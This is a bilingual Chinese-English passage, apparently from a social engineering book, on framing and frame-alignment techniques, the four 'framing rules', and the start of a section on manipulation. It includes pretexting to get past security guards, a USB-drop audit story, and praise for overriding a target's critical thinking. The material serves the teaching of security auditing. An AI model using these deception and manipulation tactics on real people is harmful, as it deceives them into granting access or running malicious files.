对于这位喜剧演员来说,如果有一个捣乱者——一个不认为她很酷、有趣、聪明或自信的人——会怎么样呢?由于捣乱者的框架,他们会生气、不开心、被打扰或只是不感兴趣?如果喜剧演员坚持自己的框架,他可能会改变他周围的一些人,但除非他深入研究并试图理解某人的出发点,否则他将无法协调他们的两个框架并将那个人带入他的框架。能够处理捣乱者的喜剧演员能够抛开对自己框架的恐惧,并利用捣乱者为自己谋利。

In the comedian’s case, what if there is a heckler—a person who doesn’t see her as cool, funny, intelligent, or confident? Because of the heckler’s frame they are angry, not happy, put off, or just not interested? If the comedian persists in his frame he may convert some people around him, but until he delves deep and try to understand where someone is coming from he will not be able to align their two frames and bring that person into his frame. The comedian who can handle a heckler is able to put aside her fears about her frame and use the heckler to her advantage.

 

框架桥接对齐技术可能是社会工程师使用的最强大的技术之一,但需要进行一些准备以确保正确使用。

The frame bridging alignment technique can be one of the most powerful used by a social engineer, but involves some preparation to make sure you get it right.

 

社会工程师可以利用这种特殊的框架对齐方式,通过适当的借口帮助目标弥合他们所看到的内容与他们需要相信的内容之间的差距。再次回想一下以技术支持代表身份试图进入大楼的例子。您的着装、工具和语言必须符合目标对支持代表的期望。如果符合,桥梁就建立起来了,对齐就发生了。

A social engineer can utilize this particular form of frame alignment by helping a target bridge the gap of what they see and what they need to believe through a proper pretext. Again, recall the example of trying to gain access to the building as a tech support rep. Your dress, tools, and language must match the frame that the target expects of a support rep. If they do, the bridge is created and alignment occurs.

 

帧放大

Frame Amplification

 

根据斯诺的说法,框架放大是指“澄清和激发与特定问题、难题或事件相关的解释框架”。换句话说,你将放大或关注目标的价值观或信念。通过关注这些价值观,你可以找到一个可以让你的两个框架保持一致的领域,或者至少让目标认为它们是一致的。

Frame amplification, according to Snow, refers to “the clarification and invigoration of an interpretive frame that bears on a particular issue, problem, or set of events.” In other words, you will amplify, or focus on, the values or beliefs of the target. By focusing on those values you can find an area that will align your two frames, or at least drive the target to think there is alignment.

 

这种对齐方式被称为四种对齐方式中最基本的一种,因为它更像是一种维护方法。它涉及强调、增强或标点某个事件,使其比其他事件更重要,这使得该事件更容易与其他事件联系起来。

This form of alignment has been labeled as the most basic of the four because it is more of a maintenance method. It involves the accenting, augmenting, or punctuating of an event as being more important than others, which allows for this event to be linked with other events with greater ease.

 

如果我们进一步研究前面关于全身 X 射线扫描仪的例子,就会发现一个框架放大的例子。现在,扫描仪被当作恐怖分子的威慑物出售。他们出售的框架是最近的恐怖活动如何引发了对此类产品的需求,而它们就是为了满足这种需求而存在的。然而,对这些设备的研究表明,早在 9/11 袭击和其他近期袭击之前,它们就被制造、营销和拒绝了。

An example of frame amplification can be revealed if we do further research into the earlier example about the full-body X-ray scanners. The scanners are being sold now as deterrents for terrorists. The frame that they are being sold under is how the recent terrorist activity caused a need for products like these, and here they are to fulfill that need. Yet research into these devices shows they were being built, marketed, and rejected long before the attacks of 9/11 and other recent attacks.

 

利用“9·11”事件以及许多人因这些袭击而产生的飞行恐惧,扫描仪公司能够将他们的框架与许多人的恐惧框架联系起来,从而获得在全球各地机场实施这些设备的支持。

Using the events of 9/11 combined with the fear of flying many people have due to those attacks enables the scanner companies to link their frame with the frame of fear many people have, and thereby gain support for implementing these devices in airports around the globe.

 

框架放大的另一个优势是,它可以成功地模糊框架,使持有某种信念的人远离这种信念。例如,许多相信隐私和选择如何接受检查的自由的人被 X 射线扫描仪制造商带入了不同的框架,他们专注于其他检查方法的某些方面不安全或不完整,为了证明他们的观点,他们编造了“内衣炸弹”之类的故事。这些策略利用人们普遍持有的关于其他方法缺乏安全性的信念,放大了他们的框架,即新的 X 射线扫描仪更好、更安全。

One of the other strengths of frame amplification is that it can be successfully used to blur the frame and cause people with a certain belief to distance themselves from that belief. For example, many who believed in privacy and the freedom to choose how to be screened have been brought into a different frame by the x-ray scanner manufacturers focusing on certain aspects of other screening methods being unsafe or incomplete, and to prove their point they bring out stories like “the underwear bomber.” Such tactics amplify their frame that the new x-ray scanners are better and safer, using widely held beliefs regarding the lack of security of other methods.

 

社会工程师可以通过几种不同的方式利用这种协调技术。例如,社会工程师可能想说服保安让他进入现场垃圾箱区域。为废物处理承包商工作的借口很好,单独使用也很有效,但如果你提出其中一个垃圾箱受损的想法,效果会更好,这代表公司的安全责任。扩大这个框架可以让你和保安达成一致,最好的解决方案是让你到现场检查。

A social engineer can utilize this alignment technique in a few different ways. For instance, a social engineer may want to convince a security guard to give him access to an onsite dumpster area. The pretext of working for a waste disposal contractor is good and it very well may work alone, but it would work even better if you presented the idea that there is damage to one of the dumpsters, which represents a security liability for the company. Amplifying that frame can bring you to an alignment with the security guard that the best solution is allowing you onsite to check it out.

 

帧扩展

Frame Extension

 

框架扩展是一种运动努力通过扩展拟议框架的边界来包含群体的观点、兴趣,更重要的是,情感,从而吸纳参与者。”换句话说,通过扩展框架的边界来包含目标的其他主题或兴趣,你可以使它们保持一致。

Frame extensions are a movement’s effort to incorporate participants by extending the boundaries of the proposed frame to encompass the views, interests, and, more importantly, the sentiments of a group.” In other words, by extending your frame’s boundaries to encompass other subjects or interests of your target, you can bring them into alignment.

 

例如,支持环境或“绿色”倡议的团体可能会将其框架扩展到反核运动,声称他们属于关注环境风险的群体。

For example, the possibility exists that groups who support environmental or “green” initiatives will extend their frame to antinuclear movements, stating they are under the umbrella of a being concerned about the environmental risks.

 

然而,使用框架扩展的风险在于,它们可能会削弱对原始框架的立场,并可能失去一定程度的吸引力。这可以通过在某个框架中包含过多的框架扩展来实现,最终稀释主框架并导致失去兴趣。

However, a risk with using frame extensions is they can weaken the stance on the original frame and a certain level of appeal can be lost. This can be done by including too many frame extensions into a certain frame, eventually diluting the main frame and causing interest to be lost.

 

即使是在个人层面,简单才是最好的。使用这种框架对齐策略时,请保持简单易懂。不要让连接网络过于复杂,否则会失去目标的兴趣。

Even on a personal level, simple is best. When using this frame alignment tactic, keep it simple and easy to follow. Don’t make the connecting web so convoluted you lose the interest of the target.

 

社会工程师可以通过第 3 章中讨论的诱导技巧来利用这种框架对齐技术。当社会工程师接近目标时,她可以不表现出对目标或其公司感兴趣,而是利用聚会上的闲聊或以记者的身份为借口来收集有关目标或其公司的信息。这将使社会工程师有“权利”索要他们通常必须非常努力才能获得的信息。

A social engineer may utilize this frame alignment technique through the elicitation skills discussed in Chapter 3. When a social engineer approaches a target, she can gather information about the target or their company by not acting interested in that but utilizing chit-chat at a party, or with a pretext as a reporter. This will give the social engineer the “right” to ask for information that they would normally have to work very hard to get.

 

框架变换

Frame Transformation

 

当所提出的框架可能与传统的生活方式或仪式以及现存的解释框架不产生共鸣,有时甚至显得与之对立时,框架转变是一个必需的过程。”换句话说,社会工程师会提出新的论点,指出为什么他们的框架更好,以努力将目标的思想或信念从他们现在的位置转变为社会工程师希望他们成为的位置。

“Frame transformation is a process required when the proposed frames may not resonate with, and on occasion may even appear antithetical to, conventional lifestyles or rituals and extant interpretive frames.” In other words, a social engineer offers new arguments that point to why their frame is better in an effort to transform the thoughts or beliefs of a target from where they are to where the social engineer wants them to be.

 

当框架发生转变时,需要新的价值观和新的理解来让人们参与并保持他们的支持。这种转变在 20 世纪 70 年代在社会层面上得到了广泛的体现,当时保守运动被重新框架或转变为更进步的环保运动。

When a frame transformation occurs, new values and new understandings are required to keep people involved and keep their support. This type of transformation was done on a large social level in the 1970s where the conservative movement was reframed or transformed into a more progressive environmentalist movement.

 

从更小、更个人的角度来看,框架转变每天都会通过宗教转变发生,即一个人的框架或整个信仰体系被改变、变更和转变,以与新的思维框架即新宗教保持一致。

On a smaller, more personal scale, frame transformations occur every day through religious conversion, in which a person’s frame or whole belief system is altered, changed, and transformed to be aligned with a new frame of thought, that of the new religion.

 

改变一个人的框架并不容易;它是实践中最复杂的调整策略之一,因为它可能需要:

Transforming someone’s frame is not easy; it is one of the most complicated alignment tactics to put into practice because it can take:

 
 
     
  • 时间:改变一个人的整个信仰结构不是一个快速的过程,可能需要使用其他调整技术和大量时间才能发挥作用。
  • Time: Changing someone’s whole belief structure is not a quick process and can take the usage of other alignment techniques and lots of time to make it work.
  •  
     
  • 努力:了解目标来自哪里以及你希望他处于什么位置只是第一步。他的反对意见和心理障碍是什么?找出这些事情需要一些努力。
  • Effort: Knowing where the target is coming from and where you want him to be are just the initial steps. What will be his objections and mental blocks? Finding out these things will take some work.
  •  
     
  • 教育:知识就是力量。你必须帮助目标理解你希望他“转变”的新框架。
  • Education: Knowledge is power. You must help the target understand the new frame you want him to “convert” to.
  •  
     
  • 逻辑:教育必须合乎逻辑,不能全是情绪。目标必须能够推理和合理化他即将采取的行动。他能做到这一点的唯一方法是用逻辑。
  • Logic: The education must be logical and not all emotion. The target must be able to reason and rationalize the action he is about to take. The only way he can do that is with logic.
  •  
     
  • 深厚的情感纽带:知识是让人做好行动准备的因素,逻辑使他相信采取这一行动是好的,而情感才是促使行动发生的因素。如果你对你的“事业”充满情感,目标也会感受到这种情感。只要确保你表达和感受到的情感与借口相符即可。如果你的借口是指导顾问,而你像啦啦队员一样出现,那么你将抵消目标的协调能力。
  • Deep emotional ties: Knowledge is what prepares a person for action, logic convinces him the action is good to take, but emotion is what makes the action happen. If you are emotional about your “cause” the target will feel that emotion. Just make sure the emotion you are expressing and feeling matches the pretext. If your pretext is a guidance counselor and you come in like a cheerleader you will offset the target’s ability to align.
  •  
 

能够让别人认同你的框架,让自己认同别人的框架,可以激励别人去做你要求的事情。虽然使用这四种框架方法中的任何一种都很有效,但一个成功改造框架的社会工程师拥有无穷的力量。

Being able to align others to your frame and align yourself with theirs can give people incentive to do the things you ask. Although using any of the four framing methods is powerful, a social engineer who is successful in frame transformation has endless power.

 

请继续阅读,了解作为一名社会工程师如何应用这些框架技术。

Read on to find out how to apply these framing techniques as a social engineer.

 

使用框架进行社会工程

Using Framing as a Social Engineer

 

在本节中,我提到了社会工程师使用框架作为技巧的多种方式。其中一些方法非常有效,完善它们可以让你成为影响大师。

Throughout this section I mentioned many ways a social engineer might use framing as a technique. Some of these methods are so powerful that perfecting them can turn you into a master influencer.

 

要真正将框架作为社会工程师来使用,你必须了解有关框架的四个方面。这四个方面将帮助你清楚地了解框架的工作原理以及如何将其用作社会工程师。

To truly use framing as a social engineer you must understand four things about framing. These four things will help you to understand clearly how framing works and how to use it as a social engineer.

 

记住什么是框架。框架是我们大脑在思考时使用的概念结构。这是一条至关重要的信息,因为你的目标是创建新的框架、与某人的框架保持一致或将目标纳入你的框架。

Remember what a frame is. A frame is a conceptual structure that our minds use in thinking. This is a vital piece of information because your goal is either to create a new frame, align with a person’s frame, or bring the target into your frame.

 

为了作为一名社会工程师掌握框架,需要用以下四条规则来概括这三个目标之一。

One of those three goals needs to be outlined with the following four rules in order to master framing as a social engineer.

 

规则 1:你说的每句话都会引发一个框架

Rule 1: Everything You Say Will Evoke a Frame

 

人们的思维通过想象来运作。这一自然事实无法改变,但你可以利用它为自己谋利。

People’s minds work by picturing things. This natural fact cannot be altered, but you can use it to your advantage.

 

如果我开始和你谈论你的老板,你的脑海里就会浮现出他的形象。如果我用文字描述他在外面打电话时的情景,你的脑海里就会浮现出他愤怒的表情、肢体语言和言语。你将无法控制这一点,而这种心理框架将会引起情绪和反应。

If I start to talk to you about your boss, your mind will picture him. If I paint a picture with words about how he was outside on the cell phone and he was angry, your mind will start to picture his angry face, body language, and words. You will not be able to control this and that mental frame will cause emotions and reactions.

 

用文字描绘画面是使用框架的有效方法。通过仔细选择文字,您可以让目标人物的头脑想象您希望他想象的事物,并开始将他带入您想要的框架。

Painting a picture with words is a powerful way to use framing. By choosing your words carefully you can cause a target’s mind to picture things you want him to picture and start moving him to a frame you want.

 

你有没有听过某个你认为很会讲故事的人?为什么?是什么让她如此优秀?她能够描绘出一幅心理画面,让你在脑海中看到事物,这激起了你的兴趣并让你参与其中。这项技能对于社会工程师来说非常重要。这并不意味着你说话时总是像在讲一个精彩的故事,而是你要记住你选择的词语,因为这些词语具有在目标心中描绘画面的力量。

Have you ever heard someone who you thought was a great storyteller? Why? What made her great? She was able to paint a mental picture, make you see things in your mind, which intrigues you and gets you involved. This skill is very important for a social engineer. It doesn’t mean you talk as if you are telling a great story all the time, but you want to keep in mind the words you choose because those words hold the power to paint pictures in the minds of the targets.

 

举个简单的例子:我可以告诉你,我昨晚吃的是意大利面。如果你不是美食家或者不是意大利人,那么你上次吃意大利面可能就没那么愉快了。你的心理框架不够强大,你可能会对它失去兴趣。

Here is a simple example: I can tell you that I had spaghetti for dinner last night. If you are not a foodie or not Italian, maybe the last time you had spaghetti it wasn’t that pleasurable. Your mental frame is not that strong and you might be turned off.

 

如果我告诉你,昨晚我妻子用藤蔓成熟的西红柿和她在花园里种植的罗勒做了一道酱汁,你会怎么想?酱汁里还加入了大块新鲜大蒜和牛至,还有一丝红酒的味道。她把酱汁浇在一盘煮得恰到好处的意大利面条上,配上自制的蒜蓉面包。

What if I told you that last night my wife made a sauce of vine-ripened tomatoes and basil she grew in the garden? It also had chunks of fresh garlic and oregano in it, as well as a hint of red wine flavors. She served it over a plate of perfectly cooked spaghetti noodles and with homemade garlic bread.

 

无论你是否喜欢意大利面,你想象的都是一道餐厅级的菜肴。这就是你如何根据目标规划你的措辞。它们应该描述性强、有力且充满图片。然而,需要注意的是,作为一名社交工程师,不要过于夸张。你的目标应该是用你的文字构建一幅画面,而不是吸引人们对你自己或你的表达方式的注意。

Whether or not you are a pasta fan, you are picturing a restaurant-quality dish. This is how you should plan your words with your targets. They should be descriptive, robust, and full of pictures. Yet the caution is not to be overly theatrical as a social engineer. Your goal should be to build a picture with your words, not to draw attention to yourself or your delivery.

 

规则 2:在框架内定义的单词会唤起思维框架

Rule 2: Words That Are Defined Within a Frame Evoke the Mental Frame

 

你不必使用确切的词语来让别人想象你想要的画面。例如,当你读到以下句子时,你会想到什么?

You don’t have to use the exact words to make a person picture the frame you want. For example, what do you think of when you read the following sentence?

 

“我看到这只昆虫挣扎着想从网中挣脱出来,但它没能成功。片刻之后,它就被裹进了一个茧里,被留作晚餐。”

“I saw the insect struggle to get free from the web, but he could not. Moments later he was wrapped up in a cocoon and saved for dinner.”

 

请注意,我不必提到蜘蛛就能让你想到蜘蛛。如果我想让你想到蜘蛛,我不用提到蜘蛛这个词就能做到。这种强大的影响和框架规则使社会工程师能够使用间接言语来控制目标的思想。

Notice, I didn’t have to mention a spider to make you think of a spider. If I want to frame you into thinking about a spider, I can do it without having to mention the word spider. This powerful rule of influence and framing gives a social engineer the ability to control the target’s thoughts using indirect speech.

 

演讲会是一个专注于人们演讲能力的国际组织,它教导其成员通过让听众的情绪参与进来,用演讲打动人们。讲一个故事,让目标人物想象你想要的画面,同时让他们参与其中,这将巩固你在引导对话中的地位。

Toastmasters, the international organization focused on people’s speaking abilities, teaches its members to move people with their speech by getting their audience’s emotions involved. Delivering a story that causes the target to picture the frame you want while involving them emotionally will solidify your standing in leading that conversation.

 

同样,使用这种构图方法需要规划。这个构图规则的一个强大之处在于,当目标的大脑正在处理你输入的信息并生成你正在描绘的心理画面时,有时你可以植入想法或创意。与我直接描绘一道漂亮的意大利面不同,这条规则允许目标自由地描绘其他东西。

Again, using this method of framing will take planning. A powerful aspect to this frame rule is that while a target’s brain is processing the information you are feeding it and generating the mental pictures you are painting, there is a time when you can plant thoughts or ideas. Unlike where I painted a direct picture of a beautiful pasta dish, this rule allows the target the freedom to picture something else.

 

我本可以这样结束我之前的意大利面晚餐故事:“然后我的妻子把它放在一盘煮得恰到好处的意大利面上。什么样的意大利面?我不是在告诉你,你必须自己想象。”当你的大脑开始想象它时,我就可以说,“当我用叉子把它卷起来时,酱汁是如此的浓稠和完美,它粘在了每根面条上。”

I could have ended my earlier spaghetti dinner story with, “My wife then served it on a plate of perfectly cooked pasta. What kind of pasta? I am not telling you, you have to picture it,” and when your brain starts to picture it then I can say, “As I twirled it on my fork, the sauce was so thick and perfect it clung to each noodle.”

 

这个描述勾勒出了意大利面的形象。你还会旋转其他什么意大利面?(我知道还有其他的,但你明白我的意思。)

This description paints the mental picture of spaghetti. What other pasta do you twirl? (I know there are others, but you get the point.)

 

规则 3:否定框架

Rule 3: Negating the Frame

 

如果我告诉你不要想象蜘蛛网里的蜘蛛,你的大脑必须首先想象蜘蛛,然后告诉自己不要想象它。

If I tell you to not picture a spider in a web, your brain has to picture the spider first to tell yourself to not picture it.

 

这种否定框架的技术非常有效。告诉目标要小心、小心或对某事保持谨慎,会自动将他们置于你可能想要的框架中。这种技术经常被专业社会工程师使用。在一次我与一群社会工程师进行的采访中,每个人都同意这种技术非常有效。

This technique of negating the frame is powerful. Telling a target to be careful, watch out, or be cautious about something automatically puts them in the frame you may want. This technique is often used by professional social engineers. In one interview I did with a panel of social engineers, everyone agreed that this technique works great.

 

在一次审计中,我丢掉了几个 USB 钥匙,里面装满了恶意代码,我想让公司里的某个人毫不犹豫地运行它们。我找到一位我信任的员工,对他说:“约翰,我听说有人发了备忘录,要我留意掉落的几个 USB 钥匙。他们现在正在寻找它们。”

During one audit, I dropped a few USB keys that were laden with malicious code that I wanted someone in the company to run without thinking. I approached one of the employees who I had gained the trust of and said, “John, I heard a memo was issued to be on the lookout for a few USB keys that have been dropped. They are looking for them now.”

 

碰巧的是,你是一名看门人,丢下了装有恶意文件的 USB 钥匙,现在你告诉人们要小心这些文件,实际上是在为他们听从你的命令埋下祸根。这种说法消除了他们在发现恶意 USB 钥匙时可能产生的担忧,并促使他们插入钥匙查看它是谁的。

It just so happens that you are in there as a janitor and you dropped the USB keys laden with malicious files, and now by telling people to look out for them, you are in essence planting the seed for them to do your bidding. This kind of a phrase negates the worry they may feel when finding a rogue USB key and cause them to plug it in to see whose it is.

 

规则 4:让目标思考框架会强化该框架

Rule 4: Causing the Target to Think About the Frame Reinforces That Frame

 

每当大脑集中注意力或思考某件事时,它都会得到强化。你越能让目标思考或想象你希望他处于的框架,就越容易强化并将他带入该框架。

Every time the brain focuses or thinks about something it is reinforced. The more you can make the target think about or picture the frame you want him in, the easier it will be to reinforce and move him to that frame.

 

回顾第 2 章关于通信建模的内容,并分析社会工程师所开发的信息如何对您的目标产生惊人的影响。

Look back at Chapter 2 on communication modeling and analyze how the messages a social engineer will develop can have amazing effects on your targets.

 

我曾经在印度旅行。我不记得新闻里具体报道了什么,但我只知道乔治·W·布什总统在欧洲失去了人们的支持。我翻看新闻频道,看到某些欧洲国家的人们在街上悬挂长得像乔治·W·布什的娃娃。他们把美国国旗裹在娃娃身上,然后点燃娃娃。

I was once traveling in India. I don’t remember the exact incident in the news, but all I know is that President George W. Bush had lost favor with people in Europe. I was flipping through the news stations and saw how people in certain European countries where hanging dolls that looked like George W. Bush in the streets. After wrapping American flags around the dolls they were lighting them on fire.

 

那一幕令人震惊,那天晚上我和妻子通电话时说道:“哇,有关欧洲发生的新闻报道太疯狂了,是吧?”

It was a shocking scene and while I was on the phone with my wife that evening I said, “Wow that news story on what’s happening in Europe is crazy, huh?”

 

她没有听说过这件事。为什么?新闻媒体和新闻电台是陷害和操纵的高手。

She hadn’t heard anything about it. Why? News media and news stations are masters when it comes to framing and manipulation.

 

社会工程师可以通过观察媒体如何运用这一技巧学到很多东西。通过省略,即省略故事细节或整个故事本身,媒体可以引导人们得出看似他们自己得出的结论,但实际上是媒体的结论。

A social engineer can learn a lot from looking at how media utilizes this skill. By using omissions, or leaving out details of a story or the whole story itself, the media can lead people to a conclusion that seems like their own, but really is the media’s.

 

社会工程师也能做到这一点。通过省略某些细节,只“泄露”他们想泄露的细节,他们可以创建他们想让目标思考或感受的​​框架。

Social engineers can do that, too. By omitting certain details and only “leaking” details that they want leaked, they can create the frame that they want the target to think or feel.

 

标签是媒体使用的另一种策略。当他们想要塑造积极的东西时,他们可能会说“坚决捍卫…”或“我们健康的经济”。这些短语描绘了稳定和健康的心理画面,有助于得出积极的结论。同样的规则也适用于消极的框架。诸如“伊斯兰恐怖分子”或“阴谋论”之类的标签描绘了非常负面的画面。

Labeling is another tactic used by the media. When they want to frame something positive they may say things like, “the strong defense of…” or “our healthy economy.” These phrases paint mental pictures of stability and health that can help draw positive conclusions. The same rules can apply for negative frames, too. Labels such as, “Islamic terrorists” or “conspiracy theories” paint a very negative picture.

 

你可以利用这些技能用描述性词语来标记事物,从而将目标带入你想要的框架。有一次,我走近一个我想进入的警卫亭,像这里的人一样径直走了过去。我立刻被突然拦住了。我震惊地看着警卫,抱歉地说:“哦,昨天那个非常乐于助人的保安汤姆检查了我所有的证件,让我通过了。这就是为什么我认为我仍然在名单上。”

You can utilize these skills to label things with descriptive words that will bring a target into the frame you want. Once, approaching a guard booth that I wanted to gain access to, I walked right through as if I belonged. I was instantly stopped abruptly. I looked at the guard in shock and apologetically I used a phrase like, “Oh, yesterday that extremely helpful security guard, Tom, checked out all my creds and let me pass. That is why I assumed I was still on the list.”

 

给前任警卫贴上“极其有帮助”的标签,会自动将现任警卫置于我想要的框架中。如果他想获得如此有声望的标签,他最好像汤姆一样“极其有帮助”。

Labeling the previous guard as “extremely helpful” automatically puts the present guard in a frame I want. If he wants to receive such a prestigious label, he better be as “extremely helpful” as Tom was.

 

框架之所以有效,是因为它扭曲了事实,但又不会扭曲到虚假的程度,因此仍然可信。社会工程师可以创造理想的印象,而不会偏离客观性太远。

Framing is effective because it bends the truth but not so much that it becomes false, so it remains believable. A social engineer can create a desired impression without departing too far from the appearance of objectivity.

 

我读过一篇名为《现状框架增加了对酷刑的支持》的白皮书,作者是来自不同大学的 Christian Crandall、Scott Eidelman、Linda Skitka 和 Scott Morgan。他们在白皮书中提供了一组非常有趣的数据,引起了我对这个话题的兴趣。在美国,似乎许多人反对在战时使用酷刑作为获取情报信息的手段。这项研究的目的是看看研究人员是否可以通过不同的方式表达信息,让一部分人同意酷刑不那么令人讨厌。

I read a white paper called “Status Quo Framing Increases Support for Torture,” written by Christian Crandall, Scott Eidelman, Linda Skitka, and Scott Morgan, all researchers from different universities. In the white paper they supplied a very interesting data set that intrigued me on this topic. In the U.S. it seems many people are against the use of torture in wartime as a tactic for gaining intelligence information. The purpose of this study was to see whether the researchers could get a subset of people to agree that torture is less disagreeable by framing the message differently.

 

他们选取了大约 486 人作为样本,并要求他们阅读两段文字。

They took a sample group of roughly 486 people and asked them to read two paragraphs.

 

第一篇读作:

The first one read:

 

美军在中东审讯嫌疑人时使用压力审讯的方法成为新闻。这种压力审讯是新方法;据一些报道,这是美军首次广泛使用这种审讯方法。美军使用过许多不同的方法,包括将被拘留者绑在木板上,然后将其浸入水下,将被拘留者脸朝下塞进睡袋,以及用绳子将被拘留者长时间吊在痛苦的姿势下。被拘留者有时还会被禁闭数天,并且独自待着。

The use of stress by U.S. forces when questioning suspects in the Middle East is in the news. This kind of stress interview is new; according to some reports, it is the first time it has been widely used by the U.S. military. American forces have used many different methods, including strapping detainees to a board and dunking them underwater, stuffing detainees face-first into a sleeping bag, and long periods of hanging detainees by ropes in painful positions. Detainees are also kept awake and alone for days at a time.

 

本段描述了这些是美国政府用来获取数据的新技术。

This paragraph paints the thought that these are new techniques being employed by the U.S. Government to obtain data.

 

第二段内容如下:

The second paragraph read:

 

美军在中东审讯嫌疑人时使用压力审讯的方法已成为新闻。这种压力审讯方法并非新鲜事物;据一些报道,美军已使用这种方法 40 多年。美军使用过许多不同的方法,包括将被拘留者绑在木板上,然后将其浸入水中、将被拘留者脸朝下塞进睡袋,以及长时间用绳子将被拘留者吊在痛苦的姿势下。被拘留者有时还会被禁闭数天,并且独自待着。

The use of stress by U.S. forces when questioning suspects in the Middle East is in the news. This kind of stress interview is not new; according to some reports, it has been used for more than 40 years by the U.S. military. American forces have used many different methods, including strapping detainees to a board and dunking them underwater, stuffing detainees face-first into a sleeping bag, and long periods of hanging detainees by ropes in painful positions. Detainees are also kept awake and alone for days at a time.

 

该段落的现状版本与现状版本完全相同,只是该段落的第二句被替换为“这种压力面试并不新鲜;据报道,美国军方已经使用了 40 多年。”

The status quo version of the paragraph was identical, except that the second sentence in the paragraph was replaced with “This kind of stress interview is not new; according to some reports, it has been used for more than 40 years by the U.S. military.”

 

仅仅改变一个框架——这些是全新的方法还是几十年来一直使用且久经考验的方法——会有什么结果?

What were the results in just changing one frame—a frame that these are brand-new methods or that these are tried-and-tested methods that have been used for decades?

 

论文描述了研究人员的测量方法。七个项目构成了因变量的基本集合。这些项目对应一个七点“按钮”量表,其点标签为非常不同意、中等不同意、略微不同意、不确定、略微同意、中等同意和非常同意。所有项目均反向计分,因此分数越高,表明对每个项目的同意程度越高。

The paper describes the researchers’ measures. Seven items formed the basic set of dependent variables. These items corresponded to a seven-point “button” scale, with the point labels of very much disagree, moderately disagree, slightly disagree, uncertain, slightly agree, moderately agree, and very much agree. All items were reverse scored so that higher scores reflected greater agreement with each item.

 

结论是什么?“现状操纵对酷刑的整体评价产生了影响——当酷刑被描述为一种长期存在而非新做法时,人们的评价更为积极;使酷刑看起来是审讯的现状,增加了个人对使用酷刑作为一种策略的支持和理由。”

The conclusion? “The status quo manipulation had an effect on overall evaluation of torture—when described as a long-standing rather than new practice, torture was evaluated more positively; [m]aking torture appear to be the status quo for interrogations increased individual support and justifications for using it as a tactic.”

 

通过仅仅改变框架的一小部分,研究人员就能够让相当多的人达成共识,并让他们(大部分)同意酷刑是一种可以接受的政策。

By changing just one little part of the frame the researchers were able to bring a sizeable group of people into alignment and make them agree (for the most part) that torture can be an acceptable policy.

 

该论文继续评论道:“它们可以应用于许多领域,并可以影响判断、决策、审美和政策偏好”,最后总结道,“在道德选择和价值困境的呈现、框架或背景方式上进行相对温和的变化,可能会对政治选择和政策产生深远的影响。”

That paper’s remarks continued, “They can apply across many, many domains, and can affect judgment, decision making, aesthetics, and policy preferences,” concluding with, “relatively modest changes in the way ethical choices and value dilemmas are presented, framed, or put in context can have profound effect on political choice and policy.”

 

这个实验证明了框架的力量,因为它甚至可以改变人们多年来形成的核心信念、判断和决定。作为一名社会工程师,这在大多数情况下甚至不是目标。你不是试图改变人们;你只是试图让他们采取一种他们稍加思考就会明白不太好的行动。

This experiment proves how powerful framing is because it can change even core beliefs, judgments, and decisions that people may have had for years. As a social engineer that is not even the goal most of the time. You are not trying to convert people; you’re just trying to get them to take an action that with a little thought they would reason is not that good to take.

 

运用四条框架规则并进行大量规划,可以使框架成为一股不可忽视的毁灭性力量,不幸的是,这也是恶意社会工程师每天都在使用这种技术的原因。尤其是在美国和“西方文化”中,人们被训练成接受被框架,接受被告知要想什么以及如何思考。

Applying the four framing rules and doing a lot of planning can make framing a devastating force to be reckoned with, which is why, unfortunately, malicious social engineers use this technique every day. In the U.S. and “westernized cultures,” especially, people are trained to accept being framed, to accept being told what to think and how to think it.

 

如果 15 年前我告诉你,电视上几乎每个节目都是关于观看真人做真事的,你可能会笑我。为什么?因为看这样的节目听起来很无聊,很傻。然而,2006 年,《洛杉矶时报》称,真人秀电视节目的数量猛增了 128%(http://articles.latimes.com/2010/mar/31/business/la-fi-ct-onlocation31-2010mar31),自那以后,这种增长势头一直没有减缓,这是因为观看真人秀是新鲜和时尚的,我们被告知观看真人秀既好玩又有趣,所以每个人都在观看。这些节目就是一个例子,说明几年前大多数人认为很傻的事情可以变得很好看。

If I told you 15 years ago that almost every program on television would be about watching real people do real things, you might have laughed at me. Why? Because watching shows like that sounded boring and silly. Yet in 2006, the Los Angeles Times stated that the number of reality TV programs jumped up 128% (http://articles.latimes.com/2010/mar/31/business/la-fi-ct-onlocation31-2010mar31), and it hasn’t slowed down much since then, and it’s because watching them is what’s new and hip, and we are told that watching them is good and fun, and everyone does it. These shows are an example of how one thing can be made to look good that most people would have considered silly just a few years earlier.

 

框架绝对是一种艺术形式,当它与沟通和影响的科学相结合时,在熟练的社会工程师手中可以成为个人层面上的一股强大力量,通过以一种让目标“容易”与社会工程师保持一致的方式呈现信息,可以让他采取不会让他感到内疚的行动,并改变他对现实的看法。

Framing is definitely an art form that when mixed with the science of communication and influence can become a formidable force on a personal level in the hands of a skilled social engineer, through presenting information in a way that can make aligning with the social engineer “easy” for the target, can make him take action that will not leave him feeling guilty, and alter his perception of reality.

 

框架和影响是社会工程学的关键部分,尽管另一项技能通常与社会工程学的“黑暗角落”有关。本书的介绍中提到了窥视这些角落;以下部分介绍的信息将改变您看待影响的方式。

Framing and influence are key parts of social engineering, although another skill is often associated with the “dark corners” of social engineering. The book’s introduction mentioned peering into these corners; the following section presents the information that will alter the way you look at influence.

 

操纵:控制你的目标

Manipulation: Controlling Your Target

 

许多人认为操纵是一个非常黑暗的话题,它经常被描述的方式让人产生一种恐惧感。

Manipulation is considered by many to be a very dark topic, a topic that creates a sense of fear because of the way it is often portrayed.

 

看看互联网上找到的一些定义可能有助于解释:

Taking a look at a few definitions found on the Internet may help to explain:

 
 
     
  • “为了个人利益而施加狡猾或不正当的影响”
  • “exerting shrewd or devious influence especially for one’s own advantage”
  •  
     
  • “以狡猾或不正当的方式影响或控制”
  • “influence or control shrewdly or deviously”
  •  
     
  • “巧妙地控制(他人或自己)或影响,通常是为了自己的利益”
  • “control (others or oneself) or influence skillfully, usually to one’s advantage”
  •  
 

您可以清楚地看到为什么许多社会工程师对这个话题垂涎三尺。您能想象能够利用您的技能来控制或影响某人,从而为自己谋利吗?

You can clearly see why many social engineers drool over this topic. Can you imagine being able to use your skills to control or influence someone to your advantage?

 

从洗脑这种阴暗手段到推销员的微妙暗示,操纵策略是每个社会工程师都应该学习和完善的。操纵的目的是克服目标的批判性思维和自由意志。当目标失去根据知情过程做出决定的能力时,他们就会被灌输操纵者的想法、价值观、态度或推理。

From something as dark as brainwashing to the subtle hints of a salesperson, manipulation tactics are something every social engineer should study and perfect. The aim of manipulation is to overcome the critical thinking and free will of their target. When the target loses his ability to make a decision based on informed processes, they can be fed the ideas, values, attitudes, or reasonings of the one manipulating them.

 

